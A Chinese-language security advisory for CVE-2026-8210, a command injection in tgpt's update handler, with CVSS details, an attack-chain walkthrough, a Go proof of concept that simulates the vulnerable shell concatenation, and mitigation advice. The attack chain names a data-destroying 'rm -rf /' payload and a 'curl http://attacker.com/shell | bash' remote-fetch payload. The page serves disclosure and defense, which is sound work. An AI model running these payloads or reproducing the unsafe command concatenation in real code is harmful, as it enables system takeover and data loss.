CVE-2026-8210 tgpt命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8210

漏洞类型

命令注入

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

aandrew-me tgpt

漏洞概述

在Linux和macOS平台上运行的aandrew-me tgpt软件2.11.1及更早版本中存在一个安全漏洞。该漏洞位于组件Update Handler的helper.go文件中，具体影响helper.Update函数。由于该函数在处理更新相关逻辑时未能对用户输入进行充分的过滤，导致攻击者可以通过操纵输入数据执行恶意命令。尽管攻击需要本地访问权限且仅限于低权限用户，但考虑到利用代码已公开披露且供应商未做出响应，该漏洞对系统安全构成潜在威胁。成功利用此漏洞可能导致信息泄露、数据完整性受损或服务中断。

技术细节

该漏洞属于命令注入漏洞，其根本原因在于不安全的系统命令拼接。在aandrew-me tgpt的源代码helper.go中，helper.Update函数负责执行更新操作。代码在构建系统命令时，直接将外部输入（如更新包的URL或文件路径）拼接到命令字符串中，未使用参数化查询或进行严格的转义处理。在Go语言中，如果使用exec.Command调用Shell（如/bin/sh）并拼接未经清洗的字符串，攻击者可以通过注入Shell元字符（如;、`、|或$()）来截断原始命令并追加执行任意指令。根据CVSS向量（AV:L/AC:L/PR:L/UI:N/S:U），攻击者只需具备本地低权限即可在无需用户交互的情况下触发该漏洞，从而以运行tgpt进程的用户身份执行任意系统代码，这可能导致权限提升或进一步的系统渗透。

攻击链分析

STEP 1

侦察

攻击者确认目标系统上安装了aandrew-me tgpt 2.11.1或更早版本。

STEP 2

获取访问

攻击者获得目标系统的本地低权限访问权限（AV:L, PR:L）。

STEP 3

漏洞利用

攻击者调用helper.Update函数，并传入包含恶意Shell元字符的参数（如 '; rm -rf /' 或 '; curl http://attacker.com/shell | bash'）。

STEP 4

命令执行

由于缺乏输入过滤，系统将恶意输入作为命令执行，导致攻击者获得系统控制权。

STEP 5

后渗透

攻击者利用执行权限窃取数据（C:L）、篡改文件（I:L）或破坏服务（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
	"fmt"
	"os/exec"
)

// Simulation of the vulnerable helper.Update function in helper.go
func vulnerableUpdateLogic(updateURL string) {
	// Vulnerability: Direct string concatenation into a shell command
	// In the real vulnerability, the input 'updateURL' is not sanitized.
	// An attacker can inject commands using shell metacharacters like ';' or '`'.
	command := "wget -O /tmp/tgpt_update " + updateURL + " && tar -xzf /tmp/tgpt_update"
	
	// Executing the command
	cmd := exec.Command("bash", "-c", command)
	output, err := cmd.CombinedOutput()
	if err != nil {
		fmt.Println("Error:", err)
	} else {
		fmt.Println("Update Output:", string(output))
	}
}

func main() {
	// Normal usage scenario
	// vulnerableUpdateLogic("https://github.com/aandrew-me/tgpt/releases/download/v2.11.1/tgpt-linux-amd64.tar.gz")

	// Exploit scenario: Injecting a malicious command
	// Payload: ; touch /tmp/CVE-2026-8210_PWNED #
	// This creates a file to prove command execution, ignoring the rest of the original command.
	fmt.Println("[+] Attempting to exploit CVE-2026-8210...")
	maliciousInput := "https://example.com/fake.tar.gz; touch /tmp/CVE-2026-8210_PWNED #"
	vulnerableUpdateLogic(maliciousInput)
	fmt.Println("[+] Check /tmp/ for the PWNED file.")
}

影响范围

aandrew-me tgpt <= 2.11.1

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议用户暂时禁用tgpt的自动更新功能，并谨慎处理来自不可信来源的更新参数。如果可能，应从源代码手动修复该漏洞，即在helper.go文件中替换不安全的命令执行逻辑，确保所有外部输入在传递给系统命令前经过严格的转义和验证。此外，应限制本地低权限用户的权限，防止其利用此漏洞进行提权攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8210
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8210
3 Details https://www.cvedetails.com/cve/CVE-2026-8210/
4 VulDB https://vuldb.com/cve/CVE-2026-8210
5 Link https://drive.google.com/file/d/19wRsehbhotZXgE1TjenFtS3w-zRtp-PW/view?usp=sharing
6 Link https://vuldb.com/submit/803594
7 Link https://vuldb.com/vuln/362418
8 Link https://vuldb.com/vuln/362418/cti